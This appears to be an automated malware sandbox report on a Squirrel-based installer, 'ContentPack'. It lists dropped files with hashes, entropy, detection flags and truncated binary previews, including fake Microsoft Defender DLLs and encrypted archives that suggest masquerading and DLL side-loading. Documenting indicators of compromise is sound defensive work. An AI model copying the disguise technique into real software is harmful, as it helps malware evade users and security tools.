Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........W..[6..[6..[6...C..Z6..D..N6..[6..x7..D..H6..D..x6..D..6..D..Y6...C..Z6...C...6...C..Z6...C..Z6..Rich[6..........................PE..d.....&..........." .........`......@........................................p............`A............................................<............P..0........P...P...%...`......0...p...................XN..(... M..8............N...............................text...E........................... ..`.rdata.............................@..@.data...h@.......0..................@....pdata...P.......`..................@..@.rsrc...0....P.......0..............@..@.reloc.......`.......@..............@..B........................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\fuge.zip

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	data
Category:	dropped
Size (bytes):	8764801
Entropy (8bit):	7.999974027044619
Encrypted:	true
SSDEEP:	196608:He+u4ln80jwTABJKUiD2iS1+sGRVc3PC3s3Z6oF+nzPZp:HeZ4N80jwG3W2xR2YP6MX43
MD5:	88EC493F2A48D234120348AEAB6D3808
SHA1:	3FB458578198B4691B409FFEABB99EDFE3827EAD
SHA-256:	4086FF865F27274805EEB8DF9504D381AF17582632FFFD02C81245A3119A3F34
SHA-512:	9A8CF59D76CBDEB0B03525A1D3E2869688F597F2A10751E13815CB827D92F12A7FCFAB0A32932A55386BE3026124BE9CA51FC2DF6A112D3B2E00141BEBA6F5F9
Malicious:	false
Preview:	H~.Ea..kyJ._.....@....<.=..}.]..A.).W.....".gb...s...lR..4p..ekJ.......n...q.~.P......(J!...v.Ma>.<.+(.r.>...F..g8..k e...Rb..S....w...^.,.`...T.9`zC...?.37..._.Y&!..L.I..H.q..3{S.H........D.v1k.[.^n..-.....J....W.c.#y.G,.U....(V..e..EM...-!f...\.}..}.[.."......z...B.q..'c".o......._...T....~.....D.d......J......9w..b.Kik..H..fSQ........&.`.'.......92:....i...~...^...Q.mQ.;pt...."....r]..).mv...q3....H.I./.v..G.....e.4.z"...UsSn...D...I....S.A:.....\|.x...).b..7){.i0.L.r}V6.....3...._.8..XY~.;..~%....:uc.y".7...%.ip..p.....Li..wh...j._..R:.....4..9......`.._.`....PYC..k1....._$..(a..N..A...\..<./.....E..-...dM........i..y..G3!....0q..C.cm.R&W?.E@.........V..79.Mf........@.G......"#.....$.......g.b.8...tYQZ...d...~>.?.4.v.O........%.?l...R*.!.\....N..`..(..M....h.7TcQ..1.?`.3.\|..sX(;....y`..cd..K.....B..\|...X.8.......6q.`.....J...2P./G.<...^}....S.'.......J#.....q.k]Zg%..+.@.'[...cE7....g......2w<.J....1s]##....n..!.U..#.. ..6"

C:\Program Files (x86)\Microsoft.NET\fuge.zip1

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	8764801
Entropy (8bit):	7.995971570571292
Encrypted:	true
SSDEEP:	196608:sL/pb5vj/q8cFmGRouNMASrmNOpzEPbL56gRLDh4eoJx1JG:6h5vD0JRTPux4ZLRoJx1JG
MD5:	924C6BB2D6985A7BD8D6B0B3AF3D81B7
SHA1:	FD36D0B778FA1522705BF7FCD350535F1ADE3CA5
SHA-256:	008B8E5E1286E96A1FA878DA2D6B48A70C62C56359519A90B713DB450F3ECD7F
SHA-512:	F3677CF016835914A8DEB80A225C27165A8CF135F7F336F6BB897AE26A6C0DD40D96826CEB5E4B4C42040CB5A6490DC9B5B0690948EF1E235ACC632EAF2D1570
Malicious:	false
Preview:	PK........e..T.u.bp..PE......AMMonitoringProvider.dll.Z{xTE..~..!inc.. ..:.0d"-..2_7$K5.h..0 ..00$...a....l.......e..>..qd1.;....cP.8..vl......=...G......n.n..y.S.n'.p31.B..(.!UD-n..%.........GU..f-]..^R...e.>a/zt...>....e...e....?.bqq....a..^LG7E..g.j\....Kx...^\|....oo\......8...hR....eEK./kA.!..=...+.D...h{.~..B. ....>..Xxs..O...x.2...4#.o.G..J..U1...d...v#...lNAa...V4...d..].!......,...d,....V...u..a.........i..:^.,.,[...QB..CX.&....\|......7jX.=.B.%!.M.......,+"D....f....E...m.....T.W.J_.+}......W.J_.+}..cZ)..g.....4hN.VGZ...Xo.g-7...`.=....iP..zBe.....@....T..k.I.....C#...-.{..;.w..........C....4Z.....]rkS.k.......n.:..MA.@...Z..{F..>B....F...&G...87..;..Y@>q....z.s7^.Ezd.Y>.A....m.@$...)'`~.$..@F...Z.~......N}F..w._..7O...zR....)..$eQ....e..4G...q"......z"..%h.R.......H8..'u.B....~..T....Bh..s./....D.@.T..l.......A...&O..c85..8.#.....s.~......D.k.4m..........wqe..'.b2...o.o:.e..Wq..p>...Pq.....&.p.9N-...qj4.6[.gG.G...6..

C:\Program Files (x86)\Microsoft.NET\pt-BR\EppManifest.dll.mui

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3072
Entropy (8bit):	3.688226991598996
Encrypted:	false
SSDEEP:	24:eH1GSp8zgpXLUCZIN/G15JqZW0Iyc5ArqA5+DScNffzJ2Uh7/5L3guolb9fPN3Tu:ypA2zZ+G1zqZW7PA5afff5TN4x93S
MD5:	66D970ACC9C33581B9E3152CDF46C707
SHA1:	7C3ACD65D71B94837B837DFB52C1FC48E8B98F0C
SHA-256:	36F0DA44D38A45FD585CFC84B03C00185DB00F103A655821B5BD6FCCD88EB426
SHA-512:	C154E38181825C9F844ECEBAC6213FBA9C2792849097451758FCE11D728763135CA0211BB91BFADA310B2C371D77B25E6BD4CA131AD8E72815543A2F7909DFB2
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.........................................................0............@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....a..........l...P...P........a..........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... .......rsrc$02.... ...p..uI..$f.}II...3v...~.qIp;.a..........................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\pt-BR\MpAsDesc.dll.mui

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	55808
Entropy (8bit):	3.370538627905652
Encrypted:	false
SSDEEP:	384:8ELIoHwex9cxks8ntGfFDD4vlzAQQ+8+jBUJ3P+/npK5sD8XOHKXSXSXuCilXYMY:dLIoHwex9cxMtOkA3+FRpKIl5i
MD5:	50C3A70FA84C07A424EC3D2834D06523
SHA1:	4FD26B0566F31172BAC62B839ED5CB62B6625AD5
SHA-256:	95A2C437329C4C4DF4919152BC90284A90857122E4B9C868C36F103ACC52A028
SHA-512:	DE9358CE4269187C60F9CFD7E4B913747A403BC2F069C877E220AED02B63AFEC6BA115B4F79C1BBD4AC80DCFBBDBFC1739DDE34983D8DC0A10B027B41142CB91
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!................................................................6V....@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@....d...........l...P...P.......d...........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....(..@....rsrc$02.... ....^K..8.........HQM....H..IMd...........................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\pt-BR\MpEvMsg.dll.mui

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	47104
Entropy (8bit):	3.506031927133505
Encrypted:	false
SSDEEP:	384:RXSmktkGpXilFdOUry+KoK2o4XqPA/RDkVQyiQ8oiKEu8+k9Ko8uWJl:E5tVD0DuZl
MD5:	CE84B2A9F6DF190FA977504B51536808
SHA1:	08EC7406B12042AD09EE7D3124863A57CE30F197
SHA-256:	A7224212D1D6FEC1558709633EBB1580CFB6CAB230624F548239A974C7A0D6AF
SHA-512:	5F68ABC2DB6A92D195D656695A22FC5C01F135263966567227A7771F3ECA4B7690BB5278B49B30E8BD11EE4124D29F943241E0AA5A69B69FB5202DCDD2B80841
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!................................................................q.....@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....D%.........l...P...P........D%.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... ......rsrc$02.... ..........f...T.e.J#.3...:.o...D%.........................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\pt-BR\MsMpRes.dll.mui

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	8704
Entropy (8bit):	3.583197744926803
Encrypted:	false
SSDEEP:	192:7HXRd28sT8KNWW+WfjIWe/W9WZWeWW+WfjIWe/WlWkNWSuWOJW:7hd28sT1NWXWkW+W9WZWeWXWkW+WlWk/
MD5:	5D46933E794A91BFDF12CDA3348BDE8B
SHA1:	F940EC0F7C8DC00F599D24020C6785D217C8B07F
SHA-256:	69550BAD9F1CD6BAB05EC9DACD5A105BF2CBD93856217AFD6722F9C62CAB104F
SHA-512:	CCDC2E8015CC1C97B475A32F7F451C1B78CD1C80CD10E79DB123A30D5B8BA120F0D5CD68DC25DD19A09834553D072E56A4AC406AEC4C73B7DC9E199D8309C6A1
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!......... ...............................................@......^.....@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc.... ... ......................@..@....oM.7........l...P...P.......oM.7........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....".......rsrc$02.... ...Z..../..)......C....b.)....oM.7........................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\pt-BR\OfflineScannerShell.exe.mui

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	8192
Entropy (8bit):	3.658761008984688
Encrypted:	false
SSDEEP:	96:82qJtEfs2mSpy99V9KzEcEKLqBrEhMABGTzG1BNB9SBJWp+CWMeO4x9:82qJaPmDAzzDgBJWpFWMeT9
MD5:	353FFC1C5EAF0A900FABCAAB968ED76E
SHA1:	ED9F2EDA723C924D2F22F9B1F3EDF0A0B522A02B
SHA-256:	36B16B933C7E5EB93A2AD8D11F38C7793B60F09472EC9664C17E786C7361551E
SHA-512:	A28C3EC8A503BB133B9EFA158D6454CB6A39A3A4F4E98C13A19901D4DE1A86153AC081B5AF8B9CF01D45A33A8946A07CB1DB2081D89D2EB1A431416DA171542A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.........................................................@......Mk....@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc.... ... ......................@..@....o..........l...P...P.......o..........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... ..p....rsrc$01....p"..8....rsrc$02.... ...5...p.......9ps].A,wEW.....o..........................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\pt-BR\ProtectionManagement.dll.mui

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	39936
Entropy (8bit):	3.5026787417351337
Encrypted:	false
SSDEEP:	384:0R6xvTgGhZ88YmErAJwj18ChH1WgQLP89oH10fBrLjDWQWyg:qogaHYtAfc1akI1aLPg
MD5:	6817F98F4E0D412F0313C417100B89A6
SHA1:	4B1D40AE23935F47BE28E45827404C008481BE5B
SHA-256:	BA423B0529EDD4AC44F0A8FA2AABB28A3B422EEF351C3E0C06E44544350683CC
SHA-512:	07034BA97D2CF7C7334E72F998529A40C6AFB0B94881DA107ABDAB09753A8F7B575451AB06B0C6BC52BBE230B4B14F6BDA3612B9B65C7E1C0027DAD53CC34BC5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.....................................................................@.......................................... ..................................8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....]'.........l...P...P........]'.........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01.....%......rsrc$02.... ...@.`........m\.L.HO...i.<.U.x.]'.........................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\pt-BR\ProtectionManagement.mfl

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	C source, Unicode text, UTF-16, little-endian text, with very long lines (9654), with CRLF line terminators
Category:	dropped
Size (bytes):	103370
Entropy (8bit):	3.5117432836886926
Encrypted:	false
SSDEEP:	1536:0UijGqj13Lh495o14sJ5nGY4w2Y4CZnm//:WGqjFC95oqkVZk
MD5:	EAC0C55B5DDE369B236E10E36FAFECA5
SHA1:	1E19CE7B3E89460ABE9552E6B7EB3CECE169C67F
SHA-256:	71FB552585CD8C9496BF3127A6D032E6C76DFCF6C5A141B546A735F214905CCE
SHA-512:	B7406D4E02D65248DE901C6FD4CACF53A37FC932188B40FEB564937DA777296CBE22899893BCB00C56DCB5EC2D9F7966C1506BC76A2490AFD15CFA54B3F15C7C
Malicious:	false
Preview:	..#.p.r.a.g.m.a. .a.u.t.o.r.e.c.o.v.e.r.....#.p.r.a.g.m.a. .n.a.m.e.s.p.a.c.e.(.".\.\.\.\...\.\.r.o.o.t.\.\.M.i.c.r.o.s.o.f.t.\.\.W.i.n.d.o.w.s.\.\.D.e.f.e.n.d.e.r.".).....i.n.s.t.a.n.c.e. .o.f. ._._.n.a.m.e.s.p.a.c.e.{. .n.a.m.e.=.".M.S._.4.1.6.".;.}.;.....#.p.r.a.g.m.a. .n.a.m.e.s.p.a.c.e.(.".\.\.\.\...\.\.r.o.o.t.\.\.M.i.c.r.o.s.o.f.t.\.\.W.i.n.d.o.w.s.\.\.D.e.f.e.n.d.e.r.\.\.M.S._.4.1.6.".).........[.D.e.s.c.r.i.p.t.i.o.n.(.".E.s.t.a. ... .u.m.a. .c.l.a.s.s.e. .a.b.s.t.r.a.t.a. .q.u.e. .m.o.s.t.r.a. .o. .s.t.a.t.u.s. .b.a.s.e...".). .:. .A.m.e.n.d.e.d. .T.o.S.u.b.c.l.a.s.s.,.A.M.E.N.D.M.E.N.T.,. .L.O.C.A.L.E.(.".M.S._.4.1.6.".).]. .....c.l.a.s.s. .B.a.s.e.S.t.a.t.u.s.....{.....}.;.........[.D.e.s.c.r.i.p.t.i.o.n.(.".E.s.t.a. ... .u.m.a. .c.l.a.s.s.e. .a.b.s.t.r.a.t.a. .q.u.e. .m.o.s.t.r.a. .o. .s.t.a.t.u.s. .b.a.s.e...".). .:. .A.m.e.n.d.e.d. .T.o.S.u.b.c.l.a.s.s.,.A.M.E.N.D.M.E.N.T.,. .L.O.C.A.L.E.(.".M.S._.4.1.6.".).]. .....c.l.a.s.s. .M.S.F.T._.M.p.C.o.m.p.u.t.e.r.S.t.a.t.u.s. .

C:\Program Files (x86)\Microsoft.NET\pt-BR\ProtectionManagement_Uninstall.mfl

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	C source, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	1118
Entropy (8bit):	3.459513705694916
Encrypted:	false
SSDEEP:	24:QXbclK2UWvlDQzj3WvlDQzCWvlDQzwNWvlDQzYTYWvlDQzfWvlDQzyWvlDQzEWvT:e1TjDGwJ3r24RFZC
MD5:	606AA235BE1B21761E91A75475BB4CCA
SHA1:	437D21FC2BDD385A6540428B2B99D45191A38BB2
SHA-256:	9437B33FEDF880B480913612671D83AA56D7753B76D5E728DD73B9205E8A9B98
SHA-512:	3DAB122B4C4E868E687888579C0C3D3EAB561BA9F560B9A01ECC705FC5FD41B52EE42BC749382C122BA3DAA9BC203B1231DCC948654C36DC2F9B0D47A62AD6BF
Malicious:	false
Preview:	..#.p.r.a.g.m.a. .n.a.m.e.s.p.a.c.e. .(. .".\.\.\.\...\.\.r.o.o.t.\.\.M.i.c.r.o.s.o.f.t.\.\.W.i.n.d.o.w.s.\.\.D.e.f.e.n.d.e.r.\.\.M.S._.4.1.6.".).........#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.C.o.m.p.u.t.e.r.S.t.a.t.u.s.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.E.v.e.n.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.H.e.a.r.t.B.e.a.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.P.r.e.f.e.r.e.n.c.e.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.S.c.a.n.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.S.i.g.n.a.t.u.r.e.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.T.h.r.e.a.t.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.T.h.r.e.a.t.C.a.t.a.l.o.g.".,.n.o.f.a.i.l.).....#.p.r.a.g.m.a. .d.e.l.e.t.e.c.l.a.s.s.(.".M.S.F.T._.M.p.T.h.r.e.a.t.D.e.t.e.c.t.i.

C:\Program Files (x86)\Microsoft.NET\pt-BR\shellext.dll.mui

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	3.7438394010156575
Encrypted:	false
SSDEEP:	48:ypr95MHUR8U6NFc4qy/F1rqZWd9hffmb/i7N4x93S:q0oyW9urCWCI4xs
MD5:	3464E072F66FFE6CF4DF06CF9C11D331
SHA1:	197566FD1A73D5BE8D3A720A51DB02329C6DFC54
SHA-256:	EF12115438168F6CFD797E991A7BE561812719EB31127EBC8E0B418726452520
SHA-512:	1FBC4432610257E7A5A152E07EA905EEF6DF0F15558231C01AA4C0E89A39C9FF6ABF77C8C9644BDB224B47B9E4915DA16CAFD3CC3C58A74F9EC7A9E5C4D9AD2A
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........t=.M.S.M.S.M.S..m..L.S..mQ.L.S.RichM.S.................PE..L..................!.........................................................0............@.......................................... .. ...............................8............................................................................rdata..............................@..@.rsrc........ ......................@..@.....5<)........l...P...P........5<)........$...........................................8....rdata..8........rdata$voltmd...P........rdata$zzzdbg.... .......rsrc$01..... .......rsrc$02.... ....x.j...!(y....l......)(2r.5<)........................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Microsoft.NET\shellext.dll

Download File

Process:	C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe
File Type:	PE32+ executable (DLL) (console) x86-64, for MS Windows
Category:	dropped
Size (bytes):	468312
Entropy (8bit):	5.621872137435956
Encrypted:	false
SSDEEP:	6144:+/fJNDoSCaKgg6OEBCOJzXv5ApNMY0lESLMp+W8j1sl3FIY/VLIVuV3Y0CC7HHmc:+/fDTCzgg6T3ALULE+WNl3yCIBL+
MD5:	85E67579A416A86D726D4AEC49F0EF87
SHA1:	2D7D1C1213B09924F926D9C6197A60CC3F617B3C
SHA-256:	112891EB9C3B06F6B95919E34BDDC607AF76EB9AEAEDE8E3BF3147709F0AE3B4
SHA-512:	0FB7A0C0A510A4EC9540B5A6EBA94D27BEEB4B9AE7E17DEF1DD3EF095ACAE5E66ED067EFE4A9873EB73969F48EBF29A0B7B042CEFA9C1E2187B41C00F3ED933F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......-G..i&..i&..i&..`^<.o&.."^..m&.."^..{&..i&...'.."^..L&.."^..c&.."^..h&.."^...&.."^P.h&.."^..h&..Richi&..........PE..d....l\..........." .........0...... ...............................................p,....`A................................................x............c...`...-......X%...........R..p.......................(...@...@............................................text............................... ..`.rdata..Z).......0..................@..@.data....H.......@..................@....pdata...-...`...0...P..............@..@.rsrc....c.......p..................@..@.reloc..............................@..B................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\ContentPack\BumpFiles.exe

Download File

Process:	C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	196096
Entropy (8bit):	6.4589375341129225
Encrypted:	false
SSDEEP:	3072:GZzaqLh5m21b4n86fZHi8c62bdq32BsWtEGwF4JOAg0FuDTT6E675MU:GZzvhs2Z4n1E7g34XtVYAOfTd0uU
MD5:	4490642C30F86355647A3154D5A25D7A
SHA1:	FD368F63A66C554B8E3A493D8B7BC2B834CD17A5
SHA-256:	77D6C8E668F33DFDA787CBF82BDF8D88F9B66B36F3631BECAE2AE92E9C9E9229
SHA-512:	6563482F84B9FBFC4D14C677ED4E605BD1F1D0976DFA2B7D0D08CBA850814A5006B314224E9017E6A653CBA61D0B4A4F51FF83AF19824F00AA39DDFAFA6CC81B
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........e..O.S.O.S.O.S.).R.O.S.).R.O.S.).R.O.S.'.R.O.S.'.R.O.S.'.R.O.S.).R.O.S.O.S.O.S5&.R.O.S5&.S.O.S.O.S.O.S5&.R.O.SRich.O.S........................PE..L.....p_.....................>......+.............@..........................@............@.....................................<................................!......p...............................@...............,............................text...8........................... ..`.rdata..V...........................@..@.data....#..........................@....rsrc...............................@..@.reloc...!......."..................@..B........................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\ContentPack\Update.exe

Download File

Process:	C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1899520
Entropy (8bit):	5.894883178349122
Encrypted:	false
SSDEEP:	24576:pWltPuAnUCiag6CKM2zCy9sQuOjj1VgZej6GeS4lNrCze5qhYp4t9m2:0t3UCiag6CKM2zCyZuOjJaxSS5qh
MD5:	A560BAD9E373EA5223792D60BEDE2B13
SHA1:	82A0DA9B52741D8994F28AD9ED6CBD3E6D3538FA
SHA-256:	76359CD4B0349A83337B941332AD042C90351C2BB0A4628307740324C97984CC
SHA-512:	58A1B4E1580273E1E5021DD2309B1841767D2A4BE76AB4A7D4FF11B53FA9DE068F6DA67BF0DCCFB19B4C91351387C0E6E200A2A864EC3FA737A1CB0970C8242C
Malicious:	true
Yara Hits:	Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\ContentPack\Update.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...5.p_............................>.... ........@.. .......................`............@.....................................W.... .......................@....................................................... ............... ..H............text...D.... ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B................ .......H.......LU..............,.................................................{......{......{....r.(......}......}......}........0..S........u......,G(.....{.....{....o....,/(.....{.....{....o....,.(.....{.....{....o.......0..K....... .A. )UU.Z(.....{....o....X )UU.Z(.....{....o....X )UU.Z(.....{....o....X..0...........r...p......%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....%..{.......%q.........-.&.+.......o.....(........{......{....

C:\Users\user\AppData\Local\ContentPack\app-1.0.0\BumpFiles.exe

Download File

Process:	C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	22216
Entropy (8bit):	6.866938252411722
Encrypted:	false
SSDEEP:	384:fC8JWIqWCL7oJ0GftpBjpdanCZkscHRN7js7ll7PCDG/7:VFQo6in8CCs4j877
MD5:	CC09BB7FDEFC5763CCB3CF7DAE2D76CF
SHA1:	8610D07F27A961066134D728C82EB8E5F22E7E8F
SHA-256:	F8F00900EDBA2F64BF136DD0B6C83CAF07C72F24F3D49C78B7EA24757FDBC6D0
SHA-512:	0C518487AA5BAD357BD19AD09C6CFE0B8BB522D74A916D36CF01F1BD194B59CD8457784B199DC953570AD7EF8CE67464D066BDA51E31B055C9D4D5CA060D45C5
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......a:[.%[5.%[5.%[5.... [5.%[4.)[5.... [5....$[5....$[5....$[5.Rich%[5.........................PE..L...(.AU..................................... ....@..........................`......e............`..........................(0..<....@...................@...P..0...................................H...@............0..$............................text............................... ..`.data...$.... ......................@....idata..0....0......................@..@.rsrc........@......................@..@.reloc..0....P......................@..B........................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\ContentPack\app-1.0.0\MpSvc.dll

Download File

Process:	C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	2695680
Entropy (8bit):	6.633366289954333
Encrypted:	false
SSDEEP:	24576:fx7mODrQkzw50Ri82xXPIBa3dNcH4Jd2J7zJdB1SKW/V9YXFp+59MxFYz3sjD8T0:fEcz2x7UDd/SKKApKMxFYzXTw7
MD5:	86E884477A0160A0915DA06649371E5F
SHA1:	1C6EA93F1288891A2552982D69A8343189DE80B7
SHA-256:	EE471A3847795729BD73D097D74ABA45400A291DD4DA08A9E3C77052AAC08884
SHA-512:	7A38792EFE388ED7B1CA53F6960758D7DEB99AD0D4D08C12F3BA0E68D8CD902624B1A1EEFE31073F8A86FB56CA3122EE15F405B99B99EDC68B2814952FCCC724
Malicious:	true
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...B..e.................D$.........PX$......`$...@...........................).......................................%......`%..=... ).......................%..A..................................................lk%.x.....%......................text....)$......*$................. ..`.itext..h....@$.......$............. ..`.data...d....`$......H$.............@....bss.....g....$..........................idata...=...`%..>....$.............@....didata.......%.......%.............@....edata........%...... %.............@..@.rdata..D.....%......"%.............@..@.reloc...A....%..B...$%.............@..B.rsrc........ )......f(.............@..@..............)......").............@..@........................................................

C:\Users\user\AppData\Local\ContentPack\app-1.0.0\vcruntime140.dll

Download File

Process:	C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
File Type:	PE32 executable (DLL) (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	80800
Entropy (8bit):	6.781496286846518
Encrypted:	false
SSDEEP:	1536:FRk1rh/be3Z1bij+8xG+sQxzQF50I9VSHIecbWZOUXYOe0/zuvY:FRk/+Z1z8s+s+QrTmIecbWIA7//gY
MD5:	1E6E97D60D411A2DEE8964D3D05ADB15
SHA1:	0A2FE6EC6B6675C44998C282DBB1CD8787612FAF
SHA-256:	8598940E498271B542F2C04998626AA680F2172D0FF4F8DBD4FFEC1A196540F9
SHA-512:	3F7D79079C57786051A2F7FACFB1046188049E831F12B549609A8F152664678EE35AD54D1FFF4447428B6F76BEA1C7CA88FA96AAB395A560C6EC598344FCC7FA
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Y.Dq.."..".."..+#.."..".."..+"4."}.)#.."}..#.."}./#.."}.#.."}..".."}.(#.."Rich.."........................PE..L...7.O.........."!... .....................................................P............@A........................0........ .......0...................'...@.......$..T............................#..@............ ...............................text...D........................... ..`.data...............................@....idata....... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\ContentPack\packages\ContentPack-1.0.0-full.nupkg

Download File

Process:	C:\Users\user\AppData\Local\SquirrelTemp\Update.exe
File Type:	Zip archive data, at least v2.0 to extract, compression method=deflate
Category:	dropped
Size (bytes):	1204336
Entropy (8bit):	7.998442627142358
